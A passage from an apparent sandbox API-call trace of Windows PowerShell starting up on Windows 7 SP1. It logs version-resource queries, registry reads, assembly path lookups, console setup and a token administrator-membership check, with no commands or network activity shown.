lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec664, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="6.1.7601.17514") returned 14 [0131.082] CoTaskMemAlloc (cb=0x20) returned 0x1a9ca0 [0131.082] lstrcpyW (in: lpString1=0x1a9ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0131.082] CoTaskMemFree (pv=0x1a9ca0) [0131.082] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec30c, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") 
returned 49 [0131.082] CoTaskMemAlloc (cb=0x66) returned 0x19b800 [0131.082] lstrcpyW (in: lpString1=0x19b800, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0131.083] CoTaskMemFree (pv=0x19b800) [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x0, puLen=0xcdaf0) returned 0 [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x0, puLen=0xcdaf0) returned 0 [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x0, puLen=0xcdaf0) returned 0 [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdac8, puLen=0xcdac0 | out: lplpBuffer=0xcdac8*=0x2bec2b4, puLen=0xcdac0) returned 1 [0131.083] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0131.083] VerLanguageNameW (in: wLang=0x0, szLang=0x14d180, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0131.083] CoTaskMemFree (pv=0x14d180) [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\", lplpBuffer=0xcdb18, puLen=0xcdb10 | out: lplpBuffer=0xcdb18*=0x2bec240, puLen=0xcdb10) returned 1 [0131.092] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.092] CoTaskMemFree (pv=0x10c990) [0131.097] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.097] CoTaskMemFree (pv=0x10c990) [0131.102] RegOpenKeyExW (in: 
hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9e8 | out: phkResult=0xcd9e8*=0x304) returned 0x0 [0131.104] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9d8 | out: phkResult=0xcd9d8*=0x308) returned 0x0 [0131.104] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda68 | out: phkResult=0xcda68*=0x30c) returned 0x0 [0131.108] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd9ac, lpData=0x0, lpcbData=0xcd9a8*=0x0 | out: lpType=0xcd9ac*=0x1, lpData=0x0, lpcbData=0xcd9a8*=0x56) returned 0x0 [0131.109] CoTaskMemAlloc (cb=0x5a) returned 0x19b640 [0131.109] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd97c, lpData=0x19b640, lpcbData=0xcd978*=0x56 | out: lpType=0xcd97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd978*=0x56) returned 0x0 [0131.109] CoTaskMemFree (pv=0x19b640) [0131.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.127] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.148] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.149] CoTaskMemFree (pv=0x10c990) [0131.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.441] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.441] CoTaskMemFree (pv=0x10caa0) [0131.442] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.442] CoTaskMemFree (pv=0x10caa0) [0131.479] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.479] 
GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.480] CoTaskMemFree (pv=0x10caa0) [0131.481] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.481] CoTaskMemFree (pv=0x10caa0) [0131.481] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.481] CoTaskMemFree (pv=0x10caa0) [0131.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0131.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0131.664] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.664] CoTaskMemFree (pv=0x10caa0) [0131.670] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.670] CoTaskMemFree (pv=0x10caa0) [0131.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 
nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0132.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0132.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0132.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.452] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0132.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0132.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0132.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0132.855] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0132.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0132.855] CoTaskMemFree (pv=0x10ccc0) [0132.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0132.946] SetErrorMode (uMode=0x1) returned 0x1 [0132.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd940 | out: lpFileInformation=0xcd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0132.946] SetErrorMode (uMode=0x1) returned 0x1 [0133.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.125] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.127] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.127] CoTaskMemFree (pv=0x10ccc0) [0133.132] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.132] CoTaskMemFree (pv=0x10ccc0) [0133.133] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.133] CoTaskMemFree (pv=0x10ccc0) [0133.137] CoCreateGuid (in: pguid=0xcdd08 | out: pguid=0xcdd08*(Data1=0x89425a6c, Data2=0x7f29, Data3=0x4633, Data4=([0]=0xbe, [1]=0xf5, [2]=0x49, [3]=0xe8, [4]=0x10, [5]=0xf8, [6]=0x84, [7]=0x53))) returned 0x0 [0133.144] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.145] CoTaskMemFree (pv=0x10ccc0) [0133.148] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.148] CoTaskMemFree (pv=0x10ccc0) [0133.151] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.151] CoTaskMemFree (pv=0x10ccc0) [0133.158] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0133.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd9b0 | out: lpConsoleScreenBufferInfo=0xcd9b0) returned 1 [0133.166] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0133.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd9b0 | out: lpConsoleScreenBufferInfo=0xcd9b0) returned 1 [0133.167] GetVersionExW (in: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.170] GetCurrentProcess () returned 0xffffffffffffffff [0133.171] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd9d8 | out: TokenHandle=0xcd9d8*=0x320) returned 1 [0133.176] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd8f8 | out: TokenInformation=0x0, ReturnLength=0xcd8f8) returned 0 [0133.177] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x11b2c0 [0133.177] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x11b2c0, TokenInformationLength=0x4, ReturnLength=0xcd8f8 | out: TokenInformation=0x11b2c0, ReturnLength=0xcd8f8) returned 1 [0133.179] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcda58 | out: phNewToken=0xcda58*=0x31c) returned 1 [0133.179] 
GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd8f8 | out: TokenInformation=0x0, ReturnLength=0xcd8f8) returned 0 [0133.179] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x11b2e0, TokenInformationLength=0x4, ReturnLength=0xcd8f8 | out: TokenInformation=0x11b2e0, ReturnLength=0xcd8f8) returned 1 [0133.180] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2cc6fc0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcda68 | out: IsMember=0xcda68) returned 1 [0133.180] CloseHandle (hObject=0x31c) returned 1 [0133.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c 
[0133.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: 
